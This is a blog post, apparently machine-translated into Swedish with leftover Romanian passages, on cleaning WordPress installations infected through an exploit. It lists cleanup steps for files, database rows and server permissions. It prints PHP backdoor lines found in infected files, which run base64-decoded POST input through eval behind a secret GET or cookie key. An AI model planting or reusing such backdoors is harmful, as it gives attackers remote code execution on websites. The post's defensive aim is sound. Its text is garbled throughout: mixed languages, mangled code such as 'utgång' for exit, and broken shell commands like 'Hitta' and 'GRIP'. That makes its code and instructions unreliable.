Innan du läser det här inlägget måste du se Inlägget här, att förstå något. :)
Jag hittade i flera filer av bloggar på stealthsetts.com, koder som liknar dem nedan, som verkade som ett resultat av virus med exploitul de wordpress.:
<? php if ($ _ get [‘573ABCB060974771 '] ==”8E96D1B4B674E1D2″) {eval (base64_decode ($ _ post ['fil'])); utgång; }?>
och
<? php if ($ _ cookie ['44e827f9fbeca184′] ==”5CD3C94B4B1C57EA”) {eval (base64_decode ($ _ post ['fil'])); utgång; }?>
I ovanstående fall handlar det om filen xmlrpc.php av Sömnig, men vid en grep På servern kan du se att det finns en hel del koder i sitt slag i källor.
Rengöring av infekterade filer:
Ooookkkkyouak
1. Den bästa lösningen, efter att den är klar säkerhetskopieringDen och rena databasen är hans RADERA filerna av WordPress (puteti pastra wp-config.php si fisierele care nu tin strict de platforma wp, dupa ce sunt atent verificate) de pe server si sa faceti upload la cele originale din versiunea 2.5.1 (cu ocazia asta faceti si un upgrade de versiune wp :) ): http://wordpress.org/download/ . Stergeti inclusiv fisierele temei, daca nu aveti incredere ca puteti face o verificare atenta a lor.
Se vede ca au fost afectate si fisiere ale temelor care nu au fost folosite niciodata pe blog si simpla schimbare a temei, nu rezolva aceasta problema.
./andreea/wp-content/themes/default/index.php:<? php if ($ _ cookie ['44e827f9fbeca184′] ==”5CD3C94B4B1C57EA”) {eval (base64_decode ($ _ post ['fil'])); utgång; }?><?php get_header(); ?>
2. Cautati si stergeti toate fisierele care contin : *_new.php, *_old.php, *.jpgg, *.giff, *.pngg si fisierul wp-info.txt, daca exista.
find . -name “*_new.php”
find . -name “*_old.php”
find . -name “*.jpgg”
find . -name “*_giff”
find . -name “*_pngg”
find . -name “wp-info.txt”
3. in /tmp , Sök och radera mappar som tmpywbzt2
SQL -rengöring :
1. I tabellen wp_options Se om du existerar och tar bort raderna: interna_links_cache, RIS_F541B3ABD05E7962FCAB37737F40FAD8 och WordPress_Options.
2. Även i wp_options, gå till Active_plugins Och ta bort om det finns, ett plugin som slutar i en av tillägg *_new.php, *_old.php, *.jpgg, *.giff, *.pngg eller om det är en annan misstänkt förlängning, kolla noggrant.
3. I tabellen wp_users, se om det finns en användare som inte har något att skriva bredvid honom, i kolumnen user_nicename. Radera den här användaren, men behålla numret i ID -kolumnen. Den här användaren är möjlig att använda "WordPress" som user_login Och det verkar skapas på 00:00 0000-00-00.
4. Gå till bordet WP_USEMETA och ta bort alla rader som tillhör ID ovan.
När du har gjort denna rengöring av SQL, inaktivera och aktivera sedan lite plugin. (i bloggen -> Instrumentbräda -> Plugins)
Server Securization:
1. Se vilka kataloger och filer är ”skrivbar"(CHMOD 777) och försök att sätta på dem a chmod som inte längre tillåter dem att skriva från någon nivå. (CHMOD 644, till exempel)
hitta. -perm -2 -LS
2. Se vilka filer som har ställt in biten söder eller skridsko . Om du inte använder de filerna som läggs på dem chmod 0 eller avinstallera paketet som innehåller. De är mycket farliga, eftersom de presterar med privilegierna ”grupp"Eller"rot"Och inte med privilegierna för den normala användaren som kör den filen.
Hitta / -typ F -PERM -04000 -LS
Hitta / -typ F -PERM -02000 -LS
3. Kontrollera vilka portar som är öppna och försök att stänga eller säkra de som inte används.
Netstat -an | GRIP -I LIST
Det handlar om det. Jag ser det Vissa bloggar är banat Av Google Search och andra säger "Tja gjorde dem !!!" . De skulle ha gjort dem ... men vad säger du om Google börjar pengar alla webbplatser Vem gör SE -skräppost och trojaner (Trojan.clicker.html) i kakor?
1 tänkte på “WordPress Exploit – Rengöring av virusfiler, SQL och serversäkerhet.”